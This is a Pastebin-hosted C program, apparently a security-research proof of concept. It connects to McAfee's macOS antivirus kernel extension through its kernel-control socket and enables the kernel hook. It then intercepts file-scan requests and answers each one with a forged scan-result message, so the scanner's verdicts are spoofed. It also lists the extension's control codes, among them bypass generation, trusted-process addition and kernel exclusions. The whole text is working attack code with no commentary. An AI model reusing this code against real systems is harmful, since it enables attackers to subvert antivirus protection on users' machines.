Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- //
- // main.c
- // AVControl
- //
- // Created by User1 on 10/15/18.
- // Copyright © 2018 Scott Knight. All rights reserved.
- //
- #include <stdio.h>
- #include <stdlib.h>
- #include <sys/socket.h>
- #include <sys/kern_control.h>
- #include <strings.h>
- #include <sys/ioctl.h>
- #include <sys/sys_domain.h>
- #include <unistd.h>
- #include <pthread.h>
- int ENABLE_KERNEL_HOOK = 1;
- int DISABLE_KERNEL_HOOK = 2;
- int PUT_SCAN_RESULT_MSG = 4;
- int PUT_SCAN_TIME_OUT = 5;
- int PING_KEXT = 6;
- int GENERATE_BYPASS = 7;
- int SCAN_RW_POLICY = 8;
- int ADD_TRUSTED_PROCESS = 13;
- int FLUSH_TRUSTED_PROCESS = 14;
- int INVALIDATE_BOOSTER_CACHE = 15;
- int ENABLE_BOOSTER_CACHE = 16;
- int SET_LOG_LEVEL = 17;
- int CLEAR_DEVICE_ENTRIES = 18;
- int SET_KERNEL_EXCLUSIONS = 19;
- int CLEAR_KERNEL_EXCLUSIONS = 20;
- #define MYCONTROLNAME "com.McAfee.AVKext"
- int fd;
- void* ping(void* data)
- {
- for (;;) {
- int result = setsockopt(fd, SYSPROTO_CONTROL, PING_KEXT, NULL, 0);
- if (result){
- fprintf(stderr, "setsockopt failed on PING_KEXT call - result was %d\n", result);
- }
- sleep(50);
- }
- }
- void print_hex_memory(void *mem) {
- int i;
- unsigned char *p = (unsigned char *)mem;
- for (i=0;i<128;i++) {
- printf("%02x", p[i]);
- if ((i%16==0) && i)
- printf("\n");
- }
- printf("\n\n\n\n");
- }
- int main(int argc, const char * argv[]) {
- struct sockaddr_ctl addr;
- fd = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL);
- if (fd != -1) {
- bzero(&addr, sizeof(addr)); // sets the sc_unit field to 0
- addr.sc_len = sizeof(addr);
- addr.sc_family = AF_SYSTEM;
- addr.ss_sysaddr = AF_SYS_CONTROL;
- struct ctl_info info;
- memset(&info, 0, sizeof(info));
- strncpy(info.ctl_name, MYCONTROLNAME, sizeof(info.ctl_name));
- if (ioctl(fd, CTLIOCGINFO, &info)) {
- perror("Could not get ID for kernel control.\n");
- exit(-1);
- }
- addr.sc_id = info.ctl_id;
- addr.sc_unit = 0;
- int result = connect(fd, (struct sockaddr *)&addr, sizeof(addr));
- if (result) {
- fprintf(stderr, "connect failed %d\n", result);
- } else {
- pthread_t p_thread1;
- int a = 1;
- pthread_create(&p_thread1, NULL, ping, (void*)&a);
- int result = setsockopt(fd, SYSPROTO_CONTROL, ENABLE_KERNEL_HOOK, NULL, 0);
- if (result){
- fprintf(stderr, "setsockopt failed on ENABLE_KERNEL_HOOK call - result was %d\n", result);
- }
- char buffer[1080000]; // or whatever you like, but best to keep it large
- int count = 0;
- int total = 0;
- for (;;) {
- while ((count = recv(fd, &buffer[total], sizeof buffer - count, 0)) > 0)
- {
- total += count;
- // At this point the buffer is valid from 0..total-1, if that's enough then process it and break, otherwise continue
- char *file = &buffer[48];
- printf("%s\n", file);
- // print_hex_memory(buffer);
- char file_scan_message[1088];
- for (int i = 0; i < 1088; i++) {
- file_scan_message[i] = 0xff;
- }
- int result = setsockopt(fd, SYSPROTO_CONTROL, PUT_SCAN_RESULT_MSG, file_scan_message, 1088);
- if (result){
- fprintf(stderr, "setsockopt failed on PUT_SCAN_RESULT_MSG call - result was %d\n", result);
- }
- }
- if (count == -1)
- {
- perror("recv");
- break;
- }
- else if (count == 0)
- {
- // EOS on the socket: close it, exit the thread, etc.
- break;
- }
- }
- }
- } else { /* no fd */
- fprintf(stderr, "failed to open socket\n");
- }
- return 0;
- }
Add Comment
Please, Sign In to add comment